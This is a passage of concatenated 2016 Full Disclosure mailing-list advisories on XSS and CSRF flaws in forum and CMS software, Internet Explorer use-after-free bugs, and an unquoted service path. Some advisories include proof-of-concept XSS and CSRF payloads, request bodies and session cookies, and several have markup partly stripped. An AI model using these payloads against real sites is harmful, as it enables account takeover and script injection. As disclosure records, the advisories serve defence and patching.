vulnerable to reflected XSS.

Proof of Concept:

  http://localhost/mylittleforum-2.3.6.1/index.php";
method="POST">   alert(1)" />   

Relative Path Overwrite

Description: Because the application includes CSS files relative instead of
absolute, an attacker can overwrite the path. With some browsers, this may lead
to CSS injection.

Proof of Concept:

http://localhost/mylittleforum-2.3.6.1/index.php?id=1

4. Solution

To mitigate this issue please upgrade at least to version 2.3.7beta:

https://github.com/ilosuna/mylittleforum/releases/tag/v2.3.7beta

Please note that a newer version might already be available.

5. Report Timeline

09/05/2015 Informed Vendor about Issue (no reply)
09/15/2015 Reminded Vendor of Disclosure Date
09/15/2015 Vendor replies
10/04/2015 Vendor releases fix
11/10/2016 Disclosed to public


Blog Reference:
https://www.curesec.com/blog/article/blog/MyLittleForum-2361-XSS-amp-RPO-179.html
 
--
blog:  https://www.curesec.com/blog
tweet: https://twitter.com/curesec

Curesec GmbH
Curesec Research Team
Josef-Orlopp-Straße 54
10365 Berlin, Germany

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] Microsoft Internet Explorer 11 iertutil LCIEGetTypedComponentFromThread use-after-free details

Throughout November, I plan to release details on vulnerabilities I
found in web-browsers which I've not released before. This is the
thirteenth entry in that series. Unfortunately I won't be able to
publish everything within one month at the current rate, so I may
continue to publish these through December and January.

The below information is available in more detail on my blog at
http://blog.skylined.nl/20161117001.html.

Follow me on http://twitter.com/berendjanwever for daily browser bugs.

Microsoft Internet Explorer 11 iertutil LCIEGetTypedComponentFromThread
use-after-free
===
(The fix and CVE number for this issue are unknown)

Synopsis

A specially crafted web-page can cause the iertutil.dll module of
Microsoft Internet Explorer 11 to free some memory while it still holds
a reference to this memory. The module can be made to use this reference
after the memory has been freed. Unlike many use-after-free bugs in
MSIE, this issue, and apparently all code in this module, is not
mitigated by MemGC. This issue appears to have been addressed in July
2016, as it failed to reproduce after the July security updates were
installed.


Known affected software, attack vectors and mitigation
--
+ Microsoft Internet Explorer 11

  An attacker would need to get a target user to open a specially
  crafted web-page and allow the web-page to open a popup. The target
  user may need to run MSIE in the non-default single process mode.
  Disabling JavaScript should prevent an attacker from triggering the
  vulnerable code path.

Description
---
This looks like a pretty straightforward use-after-free, but I did not
investigate at what point in the repro the memory gets freed and when it
gets re-used, so I do not know if an attacker has any chance to force
reallocation of the freed memory before reuse.

The issue can be triggered with MemGC enabled; the object that is freed
does not appear to be protected by MemGC.

The repro requires that MSIE is run in single-process mode in order to
trigger the use-after-free. It is not known if it is possible to tweak
the repro to have MSIE take a similar code-path that leads to a
use-after-free when MSIE is not in single-process mode.

MSIE can be started in single process mode by setting the following
registry key before starting MSIE:

`HKCU\Software\Microsoft\Internet Explorer\Main\TabProcGrowth = DWORD:0`

To revert this change, remove the registry key or set the value to 1 and
restart MSIE.

Exploit
---
A number of factors appear to be getting in the way of creating a usable
exploit for this issue:
* I did not investigate if it is possible to reproduce the issue without
  opening a pop-up to make it exploitable in the presence of a pop-up
  blocker.
* I did not investigate if it is possible to reproduce the issue without
  running MSIE in single-process process mode to exploit it on a system
  with default settings.
* I did not investigate if it is possible to reallocate the freed memory
  between the free and the use-after-free in order to modify control
  flow.
Because there are so many things that would need to be investigated in
order to write an exploit, I felt it was not cost-effective for me to do so.

Time-line
-
* July 2016: This vulnerability was found through fuzzing.
* July 2016: This vulnerability was submitted to ZDI and iDefense.
* July 2016: ZDI reports they are unable to reproduce the issue.
* November 2016: Details of this issue are released.

Cheers,
SkyLined


0x2557C5AA.asc
Description: application/pgp-keys


signature.asc
Description: OpenPGP digital signature

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] CVE-2015-2482 MSIE 8 jscript RegExpBase::FBadHeader use-after-free details

Throughout November, I plan to release details on vulnerabilities I
found in web-browsers which I've not released before. This is the
twelfth entry in that series. Unfortunately I won't be able to publish
everything within one month at the current rate, so I may continue to
publish these through December and January.

The below information is available in more detail on my blog at
http://blog.skylined.nl/20161116001.html.

Follow me on http://twitter.com/berendjanwever for daily browser bugs.

MSIE 8 jscript RegExpBase::FBadHeader use-after-free

(MS15-018, CVE-2015-2482)

Synopsis

A specially crafted web-page can cause the Javascript engine of
Microsoft Internet Explorer 8 to free memory used for a string. The code
will keep a reference to the string and can be forced to reuse it when
compiling a regular expression.

Known affected software, attack vectors and mitigations
---
* Microsoft Internet Explorer 8
  An attacker would need to get a target user to open a specially
  crafted web-page. Disabling Javascript should prevent an attacker
  from triggering the vulnerable code path.

Description
---
Recompiling the regular expression pattern during a replace can cause
the code to reuse a freed string, but only if the string is freed from
the cache by allocating and freeing a number of strings of certain size,
as explained by Alexander Sotirov in his Heap Feng-Shui presentation.

Exploit
---
Exploitation was not investigated.

Time-line
-
* *March 2015*: This vulnerability was found through fuzzing.
* *March 2015*: This vulnerability was submitted to ZDI.
* *April 2015*: This vulnerability was acquired by ZDI.
* *October 2015*: Microsoft addressed this issue in MS15-018.
* *November 2016*: Details of this issue are released.

Cheers,

SkyLined


0x2557C5AA.asc
Description: application/pgp-keys


signature.asc
Description: OpenPGP digital signature

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] CVE request - Samsumg Mobile Phone SVE-2016-6343: Unauthorized API access via system service call

2016-11-18 Thread 0xr0ot

Hi,

I'd like to request CVE for the following vulnerability fixed in NOV，2016.

Fix:
http://security.samsungmobile.com/smrupdate.html#SMR-NOV-2016

Description of the security vulnerability:

Severity: Medium
Affected versions: M(6.0)
Reported on: May 26, 2016
Disclosure status: Privately disclosed.
The vulnerability allowing unauthorized access to system APIs from system
service with improper access control enables attackers to control the
device screen.
The patch includes checks for access control.

Best Regards,
0xr0ot(行之)

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] Reason Core Security v1.2.0.1 - Unqoted Path Privilege Escalation Vulnerability

Document Title:
===
Reason Core Security v1.2.0.1 - Unqoted Path Privilege Escalation Vulnerability


References (Source):

https://www.vulnerability-lab.com/get_content.php?id=2003


Release Date:
=
2016-11-14


Vulnerability Laboratory ID (VL-ID):

2003


Common Vulnerability Scoring System:

4


Product & Service Introduction:
===
Reason Core Security is an anti-malware program designed by developers 
HerdProtect.  This program is intended for use 
with your existing antivirus software and acts as a second layer of defense in 
the event that the malware slips past the 
real-time protection of your antivirus program.

(Copy of the Vendor Homepage: https://www.reasoncoresecurity.com/ )


Abstract Advisory Information:
==
An independent vulnerability laboratory researcher discovered an unquoted 
service path privilege escalate vulnerability in the Reason Core Security 
anti-virus software.


Vulnerability Disclosure Timeline:
==
2016-11-14: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=
Published


Affected Product(s):

HerdProtect
Product: Reason Core Security - Software 1.2.0.1


Exploitation Technique:
===
Local


Severity Level:
===
Medium


Technical Details & Description:

The application suffers from an unquoted search path issue in the official 
Reason Core Security v1.2.0.1 anti-virus software. 
The issue allows authorized but unprivileged local users to execute arbitrary 
code with system privileges on the active system. 
The attack vector of the vulnerability is local.


Proof of Concept (PoC):
===
The issue can be exploited by local attackers with restricted system user 
account or network access and without user interaction.
For security demonstration or to reproduce the vulnerability follow the 
provided information and steps below to continue.

-- PoC Exploitation --
C:Program FilesReasonSecurity>sc qc rsEngineSvc
[SC] QueryServiceConfig réussite(s)

SERVICE_NAME: rsEngineSvc
TYPE   : 10  WIN32_OWN_PROCESS
START_TYPE : 2   AUTO_START
ERROR_CONTROL  : 1   NORMAL
BINARY_PATH_NAME   : "C:Program FilesReasonSecurityrsEngineSvc.exe"
LOAD_ORDER_GROUP   :
TAG: 0
DISPLAY_NAME   : Reason Core Security Engine Service
DEPENDENCIES   :
SERVICE_START_NAME : LocalSystem


Security Risk:
==
The security risk of the local service path privilege escalate vulnerability in 
the antivirus software is estimated as medium. (CVSS 4.0)


Credits & Authors:
==
ZwX -  (http://zwx.fr/)  [http://www.vulnerability-lab.com/show.php?user=ZwX]


Disclaimer & Information:
=
The information provided in this advisory is provided as it is without any 
warranty. Vulnerability Lab disclaims all warranties, either expressed 
or implied, including the warranties of merchantability and capability for a 
particular purpose. Vulnerability-Lab or its suppliers are not liable 
in any case of damage, including direct, indirect, incidental, consequential 
loss of business profits or special damages, even if Vulnerability-Lab 
or its suppliers have been advised of the possibility of such damages. Some 
states do not allow the exclusion or limitation of liability mainly for 
consequential or incidental damages so the foregoing limitation may not apply. 
We do not approve or encourage anybody to break any licenses, policies, 
deface websites, hack into databases or trade with stolen data.

Domains:www.vulnerability-lab.com   - www.vuln-lab.com  
- www.evolution-sec.com
Section:magazine.vulnerability-lab.com  - 
vulnerability-lab.com/contact.php - 
evolution-sec.com/contact
Social: twitter.com/vuln_lab- facebook.com/VulnerabilityLab 
- youtube.com/user/vulnerability0lab
Feeds:  vulnerability-lab.com/rss/rss.php   - 
vulnerability-lab.com/rss/rss_upcoming.php- 
vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php- 
vulnerability-lab.com/list-of-bug-bounty-programs.php - 
vulnerability-lab.com/register.php

Any modified copy or reproduction, including partially usages, of this file, 
resources or information requires authorization from Vulnerability Laboratory. 
Permission to electronically redistribute this alert in its unmodified form is 
granted. All other rights, including the use of other media, are reserved by 
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, 
advisories, source code, videos and oth

[FD] EditMe CMS - CSRF Privilege Escalate Web Vulnerability

Document Title:
===
EditMe CMS - CSRF Privilege Escalate Web Vulnerability


References (Source):

https://www.vulnerability-lab.com/get_content.php?id=1996


Release Date:
=
2016-11-14


Vulnerability Laboratory ID (VL-ID):

1996


Common Vulnerability Scoring System:

2.8


Product & Service Introduction:
===
EditMe is a framework that serves as a Platform as a Service to build custom 
Web Applications, Web Prototyping,and Web CMS.
CMS in which any page can be a server side script that implements whatever 
dynamic functionality you dream up. That's EditMe. No FTP servers, compilers or 
IDEs required. EditMe's API uses server-side JavaScript and our templates use 
XML, so there are no new languages to lear.

(Copy of the Vendor Homepage: http://www.editme.com/ )


Abstract Advisory Information:
==
An independent vulnerability laboratory researcher discovered a csrf privilege 
escalate web vulnerability in the official EditMe content managament system.


Vulnerability Disclosure Timeline:
==
2016-11-14: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=
Published


Exploitation Technique:
===
Remote


Severity Level:
===
Medium


Technical Details & Description:

A cross site request forgery vulnerability has been discovered in the official 
EditMe content managament system.
The vulnerability allows to perform malicious client-side web-application 
requests to execute non-protected functions 
with own web context.

In the absence of security token, an attacker could execute arbitrary code in 
the administrators browser to gain 
unauthorized access to the administrator access privileges.


Proof of Concept (PoC):
===
Cross site request forgery web vulnerability can be exploited by malicious web 
application without privileged user account and without user interaction.
To demonstrate safety or reproduce csrf web vulnerability information and 
follow the steps below to continue provided.


--- PoC: CSRF Exploitation ---

Privilege Escalate CSRF Vulnerability
http://pentest.editme.com/_Register"; method="post"> 
 
 
  
Administrator 




 




--- PoC Session Logs [POST]---
Status: 200 [OK]
Host: pentest.editme.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:49.0) Gecko/20100101 Firefox/49.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: __utma=164978144.641387690.1478254033.1478262268.1478328738.3; 
__utmz=164978144.1478328738.3.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=(not%20provided);
 km_lv=x; km_ai=i3E6P9IiO690CMxX353C5RCJAVY%3D; km_uq=; 
__utma=1.330307796.1478254213.1478254213.1478329355.2; 
__utmz=1.1478254213.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 
__utmb=164978144.3.10.1478328738; __utmc=164978144; 
JSESSIONID=377D65CA3361D7998A1173C97420C846; visited=" Home 404"; 
__utmb=1.24.10.1478329355; __utmc=1; __utmt=1; editme-user=admin; 
editme-key="ECiu7PBk57GYeaLPUxHeDw=="
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 153
-
POST Method: 
mode=AdminAdd&redirect=&user-groupname=A&user-username=VulnerabilityLab&user-password=1234&user-password2=1234&user-email=tested%40live.fr®Submit=Save



Security Risk:
==
The security rsik of the client-side cross site request forgery web 
vulnerability in the application is estimated as medium. (CVSS 2.8)


Credits & Authors:
==
ZwX -  (http://zwx.fr/)  )[http://www.vulnerability-lab.com/show.php?user=ZwX]


Disclaimer & Information:
=
The information provided in this advisory is provided as it is without any 
warranty. Vulnerability Lab disclaims all warranties, either expressed or 
implied, 
including the warranties of merchantability and capability for a particular 
purpose. Vulnerability-Lab or its suppliers are not liable in any case of 
damage, 
including direct, indirect, incidental, consequential loss of business profits 
or special damages, even if Vulnerability-Lab or its suppliers have been 
advised 
of the possibility of such damages. Some states do not allow the exclusion or 
limitation of liability for consequential or incidental damages so the 
foregoing 
limitation may not apply. We do not approve or encourage anybody to break any 
licenses, policies, deface websites, hack into databases or trade with stolen 
data.

Domains:www.vulnerability-lab.com   - www.vuln-lab.com  
- www.evolution-sec.com
Section:magazine.vulnerability-lab.com  - 
vulnerability-lab.com/contact.php - 
evolution-s

[FD] Habari CMS v0.9.2 - (Backend Comments) XSS Vulnerability

Document Title:
===
Habari CMS v0.9.2 - (Backend Comments) XSS Vulnerability


References (Source):

https://www.vulnerability-lab.com/get_content.php?id=1999


Release Date:
=
2016-11-09


Vulnerability Laboratory ID (VL-ID):

1999


Common Vulnerability Scoring System:

3.5


Product & Service Introduction:
===
While there are a number of technical reasons that highlight the differences 
and advantages Habari has over other 
blogging packages, a major component of what makes Habari different is its 
community participation model.

(Copy of the Homepage:  http://habariproject.org/en )


Abstract Advisory Information:
==
The vulnerability laboratory core research team discovered a persistent cross 
site scripting vulnerability in the Habari v0.9.2 content management system.


Vulnerability Disclosure Timeline:
==
2016-11-09: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=
Published


Affected Product(s):

Habari
Product: Habari - Content Management System 0.9.2


Exploitation Technique:
===
Remote


Severity Level:
===
Medium


Technical Details & Description:

A persistent cross site scripting web vulnerability has been discovered in the 
official Habari CMS v0.9.2.
The vulnerability allows remote attackers to inject own malicious script code 
on the application-side of affected 
web modules or service function.

The persistent cross site scripting web vulnerability is located in the `name` 
parameter of the `comments` module.
Remote attackers without privileged web-application user accounts are able to 
inject malcious script code to the 
comments backend. Thus allows remote attackers to execute script code on 
preview of the comments section for 
administrators in the application backend. The attack vector of the issue is 
persistent and the request method to 
inject the malicious comments is POST. The vulnerability is a classic cross 
site scripting issue that affects the 
backend to compromise administrator accounts.

The security risk of the issue is estimated as medium with a cvss (common 
vulnerability scoring system) count of 3.5. 
Exploitation of the web vulnerability requires no privileged web-application 
user account and only low user interaction. 
Successful exploitation of the vulnerability results in persistent phishing 
attacks, session hijacking, persistent 
external redirect to malicious sources and persistent manipulation of affected 
or connected web module context.

Request Method(s):
[+] POST

Vulnerable Module(s):
[+] Feedback - Comments

Vulnerable Parameter(s):
[+] comment_name

Affected Module(s):
[+] Backend - Comments 


Proof of Concept (PoC):
===
The vulnerability can be exploited by remote attackers without user account and 
with low user interaction.
For security demonstration or to reproduce follow the provided information and 
steps below to continue.


Manual steps to reproduce the vulnerability ...
1. Open the application with an article
2. Write a comment and include as name to the comment a script code payload
3. Save to submit via POST method request
Note: Now the attacker awaits the admin watches the comments
4. The malicious script code payload executes on visit of the comments module 
in the backend
5. Successful reproduce of the remote vulnerability!


Injection Point: http://habari.localhost:8080/habari/habari#comment-form

Execution Point: http://habari.localhost:8080/habari/admin/comment?id


PoC: Exploitation (comment_name)







http://test.de/"; rel="external"><[PAYLOAD EXECUTION VIA NAME OF THE 
COMMENTS INPUT!]>


test message by pentester

2016-11-05 8:05 pm






--- PoC Session Logs [POST] ---
Status: 302[Found]
POST http://habari.localhost:8080/habari/1/d647f75a71/feedback 
Mime Type[text/html]
   Request Header:
  Host[habari.localhost:8080]
  User-Agent[Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 
Firefox/49.0]
  Referer[http://habari.localhost:8080/habari/habari]
  
Cookie[comment_f1d6f9c9f31f8745f650f82892e5d607a4c1cf15=+%2520%3E%22%23sdasd%40gmail.com%23http%3A%2F%2Fsadasd.de%2F;
 g3sid=13e938f0028945d17f32c164f7a9d904f84dfe8e%7E8br7cg0v7kr8mqut1q256vq542; 
_pk_id.2.bb5e=8b2f85bd26c204d7.1478373106.1.1478376901.1478373106.; 
_pk_ref.2.bb5e=%5B%22%22%2C%22%22%2C1478373106%2C%22http%3A%2F%2Fwww.localhost:8080%2Fdemo%2F1%2F343%2FGallery%22%5D;
 _pk_ses.2.bb5e=*; PHPSESSID=pau398b2k2gpsafkbh0pdhjvk7; style=light]
  Connection[keep-alive]
  Upgrade-Insecure-Requests[1]
   POST-Daten:
  FormUI[d4ce1bda87af8f173f916f9216dfe2fc]

[FD] Apple iOS 10.1 - Multiple Access Permission Vulnerabilities